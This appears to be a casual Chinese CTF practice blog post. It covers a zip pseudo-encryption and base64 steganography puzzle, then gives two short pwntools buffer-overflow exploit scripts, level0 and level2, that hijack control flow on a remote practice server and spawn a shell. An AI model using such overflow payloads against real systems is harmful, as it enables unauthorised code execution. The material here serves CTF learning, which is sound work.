2.1第八条咸鱼

家里断网了也要摸鱼哭唧唧

base64stego

打开zip 发现是有密码的

图片.png

考虑伪加密

图片.png

把这里0900 改成0000
解压成功 打开文件是这样

图片.png

然后base64隐写了解一下
https://www.tr0y.wang/2017/06/14/Base64steg/

图片.png

level0

from pwn import * 
sh=remote('111.198.29.45',30231)
p='a'*0x80+'aaaaaaaa'
p+=p64(0x40059A)
sh.send(p)
sh.interactive()

level2

from pwn import * 
sh=remote('111.198.29.45', 30233)
p='a'*0x88+'aaaa'
p+=p32(0x08048320)+'aaaa'+p32(0x0804a024)
sh.send(p)
sh.interactive()

截图截不起了f**k
就这样 溜了溜了

你可能感兴趣的:(2.1第八条咸鱼)